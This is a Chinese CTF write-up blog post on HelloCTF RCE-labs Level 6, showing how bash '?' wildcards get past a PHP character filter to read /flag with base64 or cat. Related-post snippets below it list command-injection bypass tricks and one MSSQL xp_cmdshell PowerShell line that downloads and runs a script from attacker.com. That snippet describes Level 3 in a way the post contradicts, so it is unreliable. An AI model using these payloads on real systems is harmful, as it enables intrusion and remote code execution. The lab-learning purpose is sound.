HelloCTF [RCE-labs] Level 6 - 通配符匹配绕过

最新推荐文章于 2025-04-19 22:28:36 发布
最新推荐文章于 2025-04-19 22:28:36 发布
阅读量396 收藏 2
点赞数 8
CC 4.0 BY-SA版权
分类专栏: RCE-远程代码执行漏洞 文章标签: php RCE漏洞 网络安全 web安全 RCE-labs靶场 CTF题目 通配符匹配绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_73049307/article/details/143316316

开启靶场,打开链接:

GET传参cmd

/[b-zA-Z_@#%^&*:{}\-\+<>\"|`;\[\]]/

b-zA-Z 过滤b到Z范围内的任何单个字符

_ 过滤下划线

:{}\-\+<>\"| 匹配这些符号之一

;\[\] 匹配这些符号之一

可以尝试在Linux终端中做下面的几个实验,使用echo方法输出?匹配的字符串

bash-5.1# echo /???/?????? 
/bin/base64 /bin/getopt /bin/gunzip /bin/ionice /bin/iostat /bin/ipcalc /bin/mktemp /bin/mpstat /bin/umount /bin/usleep /dev/mqueue /dev/random /dev/stderr /dev/stdout /etc/conf.d /etc/group- /etc/init.d /etc/passwd /etc/shadow /etc/shells /etc/ssl1.1 /sys/kernel /sys/module

bash-5.1# echo /???/???
/bin/ash /bin/cat /bin/pwd /bin/rev /bin/sed /bin/tar /dev/pts /dev/shm /dev/tty /etc/apk /etc/opt /etc/ssl /lib/apk /sys/bus /sys/dev /usr/bin /usr/lib /usr/src /var/lib /var/log /var/opt /var/run /var/tmp /var/www

可以利用这个原理:

??a? flag

??? bin

?a??64 base64

?a? cat或tar

bash-5.1# echo /???/?a?
/bin/cat /bin/tar
bash-5.1# echo /???/?a? /??a?
/bin/cat /bin/tar /flag
bash-5.1# echo /???/?a??64
/bin/base64
bash-5.1# echo /???/?a??64 /??a?
/bin/base64 /flag

构造payload:

/?cmd=/???/?a??64 /??a? # 使用 /bin/base64 /flag

成功得到flag:

NSSCTF{ac12efd7-09f9-4bf2-af1d-e0c145a5d35a}

或者构造另一种payload:

?cmd=/???/?a? /??a? #使用 /bin/cat /flag

(这里我重开了靶场,所以flag不一样)

也一样能拿到flag

RCE以及Upload -lab的小心得
qq_42739469的博客
11-05 268
为了更好地使用代码的重用性,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码,简单点来说就是一个文件里面包含另外一个或多个文件。
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
weixin_45534587的博客
02-09 973
RCE,全称 Remote Code Execution,也就是远程代码执行。简单来说,它是一种非常危险的安全漏洞。正常情况下,我们访问一个网站或者使用某个应用程序,只能按照开发者设定好的功能来操作。但要是存在 RCE 漏洞,攻击者就能打破这种限制,在目标服务器上执行他们自己编写的代码。
[Hello-CTF]RCE-Labs超详细WP-Level 6
qq_39673370的博客
03-09 736
通配符的限制
[Hello-CTF]RCE-Labs超详细WP-Level13&Level14(PHP下的0/1构造RCE命令&简单的字数限制RCE)
qq_39673370的博客
03-13 951
PHP下的0/1构造RCE命令&简单的字数限制RCE
[Hello-CTF]RCE-Labs超详细WP-Level 0&1
qq_39673370的博客
03-08 766
RCE-Labs超详细WP-Level 0&1
[Hello-CTF]RCE-Labs超详细WP-Level7&Level8
qq_39673370的博客
03-10 896
绕过空格与输出重定向
[Hello-CTF]RCE-Labs超详细WP-Level 5
qq_39673370的博客
03-09 859
WAF绕过初试
HelloCTF [RCE-labs] Level 0 - 代码执行&命令执行
weixin_73049307的博客
10-28 612
任意代码执行(Arbitrary Code Execution,ACE)」 是指攻击者在目标计算机或目标进程中运行攻击者选择的任何命令或代码的能力,这是一个广泛的概念,它涵盖了任何类型的代码运行过程,不仅包括系统层面的脚本或程序,也包括应用程序内部的函数或方法调用。这些命令最终的指向通常是系统命令,如Windows中的CMD命令或Linux中的Shell命令,这在语言中可以体现为一些特定的函数或者方法调用,如PHP中的shell_exec()函数或Python中的os.system()函数。
4.19学习——RCE-labs刷题
最新发布
2401_88422349的博客
04-19 675
这里解释一下stdout和stderr,stdout是正常输出文件描述符1,比如我们执行的命令结果,stderr是报错输出文件描述符2,就是一些运行的错误信息,所以为什么加上2>&1就无法回显报错信息,因为将报错信息重定向到·正常输出中,然后又定向到空设备丢弃,就形成了无回显,这里可以使用;但是这里只过滤了flag,有非常多的方法,最简单的就是用/和\分隔就行了,也可以参考题目中提到的用*,[],{}去触发匹配。这题跟上面差不多,只是过滤了1,题目中提供了个脚本可以一把梭,这里的1可以用{##}进行绕过
HelloCTF [RCE-labs] Level 8 - 文件描述和重定向
weixin_73049307的博客
10-29 862
使用base64命令将/flag的内容编码成Base64格式,然后通过管道输出。这行代码将执行命令 $cmd,并且将其标准输出和标准错误输出都重定向到 /dev/null,这意味着无论命令的输出还是可能产生的错误信息都不会显示出来。2>&1 是另一个重定向操作,它把标准错误输出复制到之前的标准输出位置(即 /dev/null),这样标准错误也不会出现在屏幕上。> /dev/null 是一个输出重定向,它把标准输出重定向到 /dev/null,这样就不会有输出出现在屏幕上。一样成功得到flag。
HelloCTF [RCE-labs] Level 3 - 命令执行
weixin_73049307的博客
10-28 295
这关代码跟level 1的区别是eval($_POST['a']);变成了system($_POST['a']);system() 函数会通过软连接执行你输入的系统命令。POST传参:a=cat /flag。
HelloCTF [RCE-labs] Level 7 - 空格过滤
weixin_73049307的博客
10-29 315
空格则选择< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS之一进行替代即可。(不知道为什么这题%20(space)、%09(tab)不可以替代空格)由level 5得知flag可以用fl$*ag进行替代。GET传参cmd,对flag字符串和空格进行了过滤。
CTFhub RCE靶场
qq_64703089的博客
08-06 665
通过管道符,可以将一个命令的标准输出管理为另外一个命令的标准输入,当它失败后,会执行另外一条命令。修改发送方法为post,目标修改为/?观察phpinfo得出需要用php://input。发现 flag_8051660913375.php。遂构造php://input发现行不通,所以用php://filter。发现有个php文件,cat一下。发现 flag_is_here。
pikachu
m0_74871683的博客
10-17 852
首先,随便选一个球星,观察到url是可见其中包含了一个文件file1.php,猜测这里其他文件名可能也是个filex.php(x是数字)的格式把5个NBA球星都选一遍,发现文件名确实是file1.php~file5.php用burp爆破,send to intruder爆破位置设置为文件名中的数字,payload设置为Numbers,从6到100,步长为1,点start attack开始爆破。
CTF之命令执行常见绕过
qq_42383069的博客
04-18 7566
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
PHP 代码执行相关函数
weixin_73049307的博客
10-28 455
过滤数组元素,如果提供回调函数,仅包含回调返回真值的元素;没有返回值,除非在执行的代码中明确返回。迭代一个数组,通过回调函数将数组的元素逐一减少到单一值。接受数组、回调函数和可选的初始值。用于调用回调函数,可以传递多个参数给回调函数,返回回调函数的返回值。对数组进行自定义排序,接受数组和比较函数作为参数。创建匿名函数,接受两个字符串参数:参数列表和函数体。返回一个匿名函数的引用。将回调函数应用于数组的每个元素,返回一个新数组。调用回调函数,并将参数作为数组传递。或其他动态执行代码的功能,用于间接执行代码。
HelloCTF [RCE-labs] Level 2 - PHP代码执行函数
weixin_73049307的博客
10-28 714
检查URL中是否有一个名为action的参数。如果有,就使用该参数的值作为start()函数的参数来执行相应的逻辑。如果没有,就执行一个空字符串并没有实际的效果,只是意味着不做任何事情。POST传参content=assert(print_r($flag))得到使用assert()函数。GET传参action。
CTF-命令注入绕过技巧总结
键盘的起始页
04-10 770
执行顺序:输出base64编码内容------>base64解码其编码内容------>执行bash命令。cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2。注意:反引号``和$()用来表示命令执行,被这两种方式包含的字符串都会被当作命令优先执行。cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2。管道符”|“左边的命令的输出会作为管道符”|“右边命令的输入。核心:利用管道符”|“将左边命令的输入作为右边命令的输出。
CTF中的命令执行绕过方式
2401_84466223的博客
06-03 1752
cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;shell 提供了 && 和 || 来实现命令执行控制的功能,shell 将根据 && 或 || 前面命令的返回值来控制其后面命令的执行。连续使用管道意味着第一个命令的输出会作为 第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。默认情况下,进程是前台进程,这时就把Shell给占据了,我们无法进行其他操作,对于那些没有交互的进程,很多时候,我们希望将其在后台启动,可以在启动参数的时候加一个'&'实现这个目的。
[RCE-labs] Level 3
01-19
### RCE-Labs Level 3 概述 RCE-Labs 是一系列针对 SQL 注入漏洞利用的教学平台,旨在帮助安全研究人员理解和掌握如何通过SQL注入实现远程代码执行 (Remote Code Execution, RCE)[^1]。Level 3 特别关注于绕过某些防护机制并最终获得服务器控制权。 ### 技术细节与挑战 在这一级别中,目标应用程序启用了 `Ole Automation Procedures` 功能: ```sql EXEC sp_configure 'Ole Automation Procedures',1; RECONFIGURE; ``` 这允许攻击者创建 COM 对象来调用外部程序或脚本引擎,从而可能引发任意命令执行的风险。然而,在实际环境中此功能通常被禁用以增强安全性。 ### 利用方法分析 为了成功完成该级别的挑战,可以考虑以下技术路径之一: #### 方法一:使用 WScript.Shell 执行系统指令 当 `Ole Automation Procedures` 被启用时,可以通过如下方式实例化 Windows Script Host 的 Shell 对象,并运行 calc.exe 来验证是否能够触发计算器应用作为测试案例: ```sql DECLARE @o int; EXEC sp_OACreate 'WScript.Shell',@o OUT; EXEC sp_OAMethod @o,'Run',NULL,'calc.exe'; ``` 这种方法展示了基本原理,但在真实场景下还需要进一步处理返回数据以及隐藏进程启动等问题。 #### 方法二:借助 PowerShell 提升权限 另一种更隐蔽且强大的手段是利用PowerShell来进行更为复杂的操作,比如下载恶意软件到本地磁盘然后加载执行等动作。不过需要注意的是这种方式可能会受到更多监控工具的关注而容易暴露行为特征。 ```sql DECLARE @cmd nvarchar(4000); SET @cmd='powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(''http://attacker.com/malicious.ps1'')"'; EXEC xp_cmdshell @cmd; ``` 上述两种途径均需谨慎对待,仅限合法授权下的渗透测试活动中采用;任何非法入侵他人计算机信息系统的行为都是违法的!
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值